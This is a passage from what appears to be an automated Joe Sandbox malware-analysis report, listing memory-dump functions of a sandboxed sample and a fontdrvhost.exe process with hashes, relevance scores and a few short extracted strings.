Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9203f5cfca73b6bb5f5c10cac5e1a35b23f6937631bdb2d21f7764eb99b0c8
Instruction ID: 9e6807bc411faf6884690c43e71f5ae10de7bc0a1580dbe5dc2cfe875143ebca
Opcode Fuzzy Hash: ee9203f5cfca73b6bb5f5c10cac5e1a35b23f6937631bdb2d21f7764eb99b0c8
Instruction Fuzzy Hash: 11C04C05F18C2A47F76A7758587257E44929F54708F990174E02DD77CFCD1C5E0216C7

Function 00007FFD9B8B4846 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction ID: 5def02801191fc6d2c2422008e9fe55e05c53aff2d9f989a9fc7ee3dacd34aef
Opcode Fuzzy Hash: 7d4b389b3a77018b8644886f23d649525823a9c1bf81f5ed4d2098966650345f
Instruction Fuzzy Hash: A4C09B15E2906D45E73457B1C4363BA71515F59204F578677405ED6091DD28664159C0

Function 00007FFD9B8B06C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1885783495.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction ID: 07f89380d43a9f96f34254c0bffcaedb631e2eb1b670c8ab6449bd81544f9804
Opcode Fuzzy Hash: fd99e662ddc3de41616e2f3b6aa489c00a7978a124b4793b5ff6eec1e7b28f01
Instruction Fuzzy Hash: AFB01200E6741F00E42433FB08920A470409B4D100FC200B0D40E400A1984D269406C2

Analysis Process: fontdrvhost.exePID: 6996, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B8A0947 Relevance: 2.0, Instructions: 2018COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 751d5c7e1ab77c6cf37ba7809f5b6af6de7f714cabb33ce4256350495493601b
Instruction ID: e947b6d47603830d3890e62bb4619dcf25ab6a43b958ad61bbff4237ef7a39fb
Opcode Fuzzy Hash: 751d5c7e1ab77c6cf37ba7809f5b6af6de7f714cabb33ce4256350495493601b
Instruction Fuzzy Hash: 0BE2A231B1991E4FEBA8EB5884A16B97792FF9C301F1505B9D00DC72E6DE38BD828741

Function 00007FFD9B8C0B55 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8C0B06

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: d256cf151afe8eff5d8cef71fc01853417fa9c9312340420e5d7147eb2df4ff6
Instruction ID: a1de2b81498e9183e3f5fc49800a1cbd8ba5ec7de31466eb1e81853637582587
Opcode Fuzzy Hash: d256cf151afe8eff5d8cef71fc01853417fa9c9312340420e5d7147eb2df4ff6
Instruction Fuzzy Hash: 10D1E171A7E69E0BE32CA7684CA20757791EF52705B2A43BECDEBC3097DD18690342C1

Function 00007FFD9B890D48 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

5Z_H, xrefs: 00007FFD9B890DF3

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 65cf8b1e9fd73fe9da1c45988419b61979b8c193bb36033d0837f40e13212b8d
Instruction ID: a2fc0a3b8b48a0bdc1537389d2f1285f8cc1aba1d8249e5bf8e931591aed7a23
Opcode Fuzzy Hash: 65cf8b1e9fd73fe9da1c45988419b61979b8c193bb36033d0837f40e13212b8d
Instruction Fuzzy Hash: A8910471A19A8D8FE789DB6888667E9BFF1FF5A301F4001BAD059C72E6DB781411C341

Function 00007FFD9B890E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fbfb9182d77dded30c747d59554397fa0f406a76b8af0593ca74ee605f9927
Instruction ID: 4fb39794ab92bf15f341759c5770c629a4aa1b7bb8eaf7203a70b70d674f7928
Opcode Fuzzy Hash: 75fbfb9182d77dded30c747d59554397fa0f406a76b8af0593ca74ee605f9927
Instruction Fuzzy Hash: 6851E372A2895D8FE798DB5C986A7EABFE0EB9A311F5001BED019C73D6CB7814118300

Function 00007FFD9B890B3F Relevance: 3.8, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9B890B46
c9, xrefs: 00007FFD9B890B56
!k9, xrefs: 00007FFD9B890B4E

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 1fbcaa2146b9788760338b2a87b67a79b1ab569b408ad7510b1716e0bb199863
Instruction ID: a26c72907a2a95cfbed55df6172d7873c8e4ab6d91d4e036ce94a8a55dd8d3a1
Opcode Fuzzy Hash: 1fbcaa2146b9788760338b2a87b67a79b1ab569b408ad7510b1716e0bb199863
Instruction Fuzzy Hash: 85F02837728E2A8BCB106BBEFC805D5BB80EB99276BD501BBD204C7261E210181AC3D0

Function 00007FFD9B8C0515 Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8C04C6

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 45931abc411f0b4cca52f1700d911033bb7a725bbf022b0d18e81bcbac1bca58
Instruction ID: b51d20806f42eea2ee71813b242ba263ee1312d8fe9b460e741643a7cbbaf4c7
Opcode Fuzzy Hash: 45931abc411f0b4cca52f1700d911033bb7a725bbf022b0d18e81bcbac1bca58
Instruction Fuzzy Hash: D5F0B4B094F3D55FCB16A7758829825BFA0EE6724174A01EEC08ACB1A3D92D8886C701

Function 00007FFD9B8C2A09 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8C2A26

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 0804eb044144661c6509f4838895a5faae3b7afffdafbf82f29a4018ee8053df
Instruction ID: 41558eab871f7d0fe2dd2887853a3b76b73fc8dd2b05035a0b283685986a8950
Opcode Fuzzy Hash: 0804eb044144661c6509f4838895a5faae3b7afffdafbf82f29a4018ee8053df
Instruction Fuzzy Hash: 5AF0656160F7C48FC716EA7488698557FA0EF6721174A52EFC045CF1A7DA1D9885C701

Function 00007FFD9B8C9EF9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8C9F16

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 26b0197b507e82dc9d4165012b381d1127a220714dfcb2791a4311517a942533
Instruction ID: 3bf72fa62f8e690ea637a901bdab9027ea3a9542c558a4a5346214b395a0946e
Opcode Fuzzy Hash: 26b0197b507e82dc9d4165012b381d1127a220714dfcb2791a4311517a942533
Instruction Fuzzy Hash: 98E0396160E7C44FDB1AAB748869454BFA0AF6720174A52EFC045CB1A7EA298889C701

Function 00007FFD9B8C04A9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD9B8C04C6

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 23c7008b6420d38a11a785cc10862ec7b442ee0e9a5cd16a711961c7567ee13f
Instruction ID: 4cc07475a6453819c79974a635e0965047e3aff5fcd0c0af4e52f197486d7be5
Opcode Fuzzy Hash: 23c7008b6420d38a11a785cc10862ec7b442ee0e9a5cd16a711961c7567ee13f
Instruction Fuzzy Hash: 1AE0657154E7C44FC716EA3488694557FA0EF6720574A51EEC085CF1A3DA1D9849C701

Function 00007FFD9B8C7BC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8C7BE6

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 807c5df551611f8d0a97f4afdab0e68e7d265dbb3011e7b040b497a03c959c29
Instruction ID: 98ce434c1b4251c16592155332c29dd29705585dca9bf0d936a322bdca33996c
Opcode Fuzzy Hash: 807c5df551611f8d0a97f4afdab0e68e7d265dbb3011e7b040b497a03c959c29
Instruction Fuzzy Hash: 19E01A6194F3C44FCB16EB7488698543FA0EE6B21178B41EFC085CF1B3E62D9949C701

Function 00007FFD9B8A3F49 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FFD9B8A3F66

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 0fe23f383d483e22caafc6331c7e6b683d137e362a5c1569d48854e89e92fc70
Instruction ID: f7aa2b1ff952f709c02ce7dd39e045c0ef4c2b37d13894de62bd6d4f523224bf
Opcode Fuzzy Hash: 0fe23f383d483e22caafc6331c7e6b683d137e362a5c1569d48854e89e92fc70
Instruction Fuzzy Hash: DFE04F7054F3C04FCB16EB7484A98457FB0DE6721078B41DEC08ACB1B3E62D8949C701

Function 00007FFD9B8A15FE Relevance: .8, Instructions: 825COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8a0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed93e30fcf959f6bd1c5ba06e4e719eac4daa097b15a2511dd29c74795d695e
Instruction ID: 071ede6ef9636e5e4c017aad61194c86593e8927b9e53b702d995d13385b29dc
Opcode Fuzzy Hash: aed93e30fcf959f6bd1c5ba06e4e719eac4daa097b15a2511dd29c74795d695e
Instruction Fuzzy Hash: 4542C321B1E94E4BEBA8EB5884A16B477A2FF9C300F1545B9D05EC32D7DE34BD828741

Function 00007FFD9B89090D Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4ae70000dc99d3264ae4cdb4bc46e5dd0260f3df7a8a436a064c11660ae8f3
Instruction ID: 47edcdd5ac7d25f4089c2d613c68655a2cedece659d50a43b93c3bd4c407bf2e
Opcode Fuzzy Hash: 8d4ae70000dc99d3264ae4cdb4bc46e5dd0260f3df7a8a436a064c11660ae8f3
Instruction Fuzzy Hash: EC412C22B1CA294FE71DB7BC74A95F97BC1DF88325B0404BBD04EC71E7DD68A8428285

Function 00007FFD9B8C1DF8 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c40657d818516957ee279f9a86525214a97e95a0a80fba49ecef5a26c318ed
Instruction ID: 4d0239a305458a17ec52c52df9a870aafde19b213d6ca6330c4f4dc77f3d7bf7
Opcode Fuzzy Hash: c1c40657d818516957ee279f9a86525214a97e95a0a80fba49ecef5a26c318ed
Instruction Fuzzy Hash: D1416972A0E95D4FE764FB98C8A4AF537A1EF99320F05027BD019C72D2DE646D458381

Function 00007FFD9B890908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
Instruction ID: bca0f1e372febbe837976f94a5852267870b57ca5a8ba7f4bf1529b6f6946c55
Opcode Fuzzy Hash: c3d7e5f302a88f8ec2398e6a7592314a031dcba88df827417dd45c6b7d3b22c7
Instruction Fuzzy Hash: 6121D83130DC194FEB68EB5CE889DB977D1FB5932171501BAE58AC7136D911EC8287C1

Function 00007FFD9B8CAAE5 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b59391de73d411b91f028e11ca2f765ac64cb40cd78141fa5a5f628301956e
Instruction ID: 045f2f3285b16c98c71c61dc74d105af6ee55c34e95d7d434d9f5fb18b7403f0
Opcode Fuzzy Hash: e6b59391de73d411b91f028e11ca2f765ac64cb40cd78141fa5a5f628301956e
Instruction Fuzzy Hash: ED3126A1B1A95E5FE7A8F76C58A66B563D2EFAC341B1400BAE00DC31EBDD386D424341

Function 00007FFD9B890C25 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff2bfb1a742e86a5aead046827ed05cb3e0b09f9f62fa1f9c7967e6e8e91eceb
Instruction ID: 67242d3cca5d2cc044b986793097555770650c26271bf964eb56fb6be2806a0a
Opcode Fuzzy Hash: ff2bfb1a742e86a5aead046827ed05cb3e0b09f9f62fa1f9c7967e6e8e91eceb
Instruction Fuzzy Hash: F6312732B1D25D8FEB26A7E89C652EC7F60EF45328F1541B3D058CB1D3D93826468791

Function 00007FFD9B891171 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f7427443e13579eed525843e36cfde0065d12c53e5eddeda47551a95e00b18
Instruction ID: ffd4b1a0c65f3e5b28049ecee116456d27625c064fcab80edfbe6a2c4a9d94cb
Opcode Fuzzy Hash: e6f7427443e13579eed525843e36cfde0065d12c53e5eddeda47551a95e00b18
Instruction Fuzzy Hash: 1631A131A0D68E9FDF56EB64C8659A97FF0EF5A300B0905FBD009D71E3DA28A944C741

Function 00007FFD9B890998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701a5470bc759148d8936116bcb213e03b23c8cbb39dbe9e669b13e7fe27d475
Instruction ID: 4523b790a5c23da9546074154c2ba2d1083ad6dfd774a297fe4fd30509cccf9a
Opcode Fuzzy Hash: 701a5470bc759148d8936116bcb213e03b23c8cbb39dbe9e669b13e7fe27d475
Instruction Fuzzy Hash: 1221F920F2DD2D1FEB98B76C546967AB6C2EB9C312F5100B9E40DC32E7DD38AC414281

Function 00007FFD9B892A0E Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb49cf54aa7f764c91e9a318d01fce54445bf4d273e72d9f50b97eefdd5271e
Instruction ID: 47493958b91138f88d434bc540e9d8413ddd1d8f7121425b014e342da1a027ea
Opcode Fuzzy Hash: 3cb49cf54aa7f764c91e9a318d01fce54445bf4d273e72d9f50b97eefdd5271e
Instruction Fuzzy Hash: E3110332B1D50D4FEF68EFE8D464ABD27D2EF98710F160175D44ED31B2DD28AA418600

Function 00007FFD9B89294E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aad447f005335d36044f9fab7e5a2a3ae8194ff232c3914eb2a1828878bffe
Instruction ID: 7655822180583076f46b6a5ad39dfedb08a13f73d185dd43f4edea62f79703cd
Opcode Fuzzy Hash: 88aad447f005335d36044f9fab7e5a2a3ae8194ff232c3914eb2a1828878bffe
Instruction Fuzzy Hash: 40113321F1D91E4FEFB8EB9884746B86691FF4C710F5601B5D44EE32B2DE286E414740

Function 00007FFD9B890C38 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29b97772516ca9f54207d5a4a5e716492b262a908c64ebbc54847decb89cdfbc
Instruction ID: 5d677564f003d3d217a1fa3193800b0180851eaf534c8b7c8f14c3a4d558b7f4
Opcode Fuzzy Hash: 29b97772516ca9f54207d5a4a5e716492b262a908c64ebbc54847decb89cdfbc
Instruction Fuzzy Hash: 4811C232B1E64D9FEB129BB4986119C7FB0EF56714F1640B3D054DB2A2E53827468780

Function 00007FFD9B890C40 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b41800984097a59a97d7a866b6f0eb8ec03ed0f3235a3e95513367b0b3781845
Instruction ID: 0b95860b426c8bdcb45cad549b315a3fb5dcae56d270435489bac2611dfd5ea5
Opcode Fuzzy Hash: b41800984097a59a97d7a866b6f0eb8ec03ed0f3235a3e95513367b0b3781845
Instruction Fuzzy Hash: 9801AD32A1E68D9FEB129BA498601997FB0EF56714F1640F3D054DB2A2D93827498780

Function 00007FFD9B8CCEA6 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71488b1945a39db5c0b3baa00e46e9fb98543f70bbaff2166aca092323af7b69
Instruction ID: 8df0f0ba300cbf31ef36988588b423f0135d6de5537324bf40b1eb5088726367
Opcode Fuzzy Hash: 71488b1945a39db5c0b3baa00e46e9fb98543f70bbaff2166aca092323af7b69
Instruction Fuzzy Hash: D4019A72F0951E4BEB68E798D4A83F9B2E1EB9C300F010472D009E7191DA38AE818B90

Function 00007FFD9B890C48 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2632a26850b3e21b245e8a2b414ecdebee7280b76df477f37caf473e839f52
Instruction ID: 64a9b6128c66e1c2c32ab4e331c466af1d1ba2639897ec7eac60b5777d00c890
Opcode Fuzzy Hash: 9b2632a26850b3e21b245e8a2b414ecdebee7280b76df477f37caf473e839f52
Instruction Fuzzy Hash: 7401C832A1E28C9FEB129BA488600987FB0EF06304F1640F3D044CB2A2E9382B498780

Function 00007FFD9B890C50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69e98c5ac202e018f4fa0537406495c618a30ab251d31efa8dc9914af63123e
Instruction ID: 341a21bd382d173806e9b5f91c080d3a440ace39ba1a61bc9f2d1a114da783fc
Opcode Fuzzy Hash: b69e98c5ac202e018f4fa0537406495c618a30ab251d31efa8dc9914af63123e
Instruction Fuzzy Hash: B8017C31E1E38DDFEB129BA488641997FB0EF16704F1641E3D054CB2A6E9386B448741

Function 00007FFD9B8929D4 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
Instruction ID: f9fbecf2eb58dcc10385430076d086ba60848318b9c564c5c2b180a6635b00c5
Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
Instruction Fuzzy Hash: E5F03631B1951E4EEF78AF94C864AF877A1FF48311F1201B9D48ED31B1DE386A818A00

Function 00007FFD9B892A9A Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
Instruction ID: 178ee989b79cac0ac8278d02df7fae1a4867d8ac22c478f8b0a3f73694fc5c90
Opcode Fuzzy Hash: 428764437d29e1890ab5c5ac2c1d17129b049794f483ad01c538d826eaafabbb
Instruction Fuzzy Hash: D2F0D621B1D40E4AEE78DF94D864AB92792EF98715F170175D48EE31B2DD286A414640

Function 00007FFD9B8CA439 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 217664a5e0e589652af0e9c72916594742e172a574c878877e0be539d4c9c3ba
Instruction ID: 91544e153e783a9c65b124145317721735bbc62158dc2fe9589979628752e257
Opcode Fuzzy Hash: 217664a5e0e589652af0e9c72916594742e172a574c878877e0be539d4c9c3ba
Instruction Fuzzy Hash: 92F0E521B5DBC80FC76AA62D4869071BFE1DB5B60134A42FFC186C72E3ED59AC858341

Function 00007FFD9B890B77 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080d8cc4106a9e78b57f6ca52af0199080451e0b5302b78b9254548529d9dabf
Instruction ID: 640ac56d0b876671c35af720ea56fa958c289c75a9efa88cd5553ae5dec9ada0
Opcode Fuzzy Hash: 080d8cc4106a9e78b57f6ca52af0199080451e0b5302b78b9254548529d9dabf
Instruction Fuzzy Hash: 63E02236608A09CFDB00AB79CC94482BF90EB0961ABAA00AED149C7622E2215828CB44

Function 00007FFD9B8C1749 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db50bb553b2a52edcf6b230bc6b94f55545eacec6b52e5246c98727e97a84c7
Instruction ID: c5b656f52c387db2fe42cd3f8daff393098e0717dd3793ecb4d9f3f42fb82b75
Opcode Fuzzy Hash: 2db50bb553b2a52edcf6b230bc6b94f55545eacec6b52e5246c98727e97a84c7
Instruction Fuzzy Hash: 13E092207197C80FC70A973888696607FA1EF5B115B8A12EBC045CB1A3EA1CDC89C741

Function 00007FFD9B8C9F89 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1886548395.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c0000_fontdrvhost.jbxd

Similarity

API ID:
String ID:
API String ID:
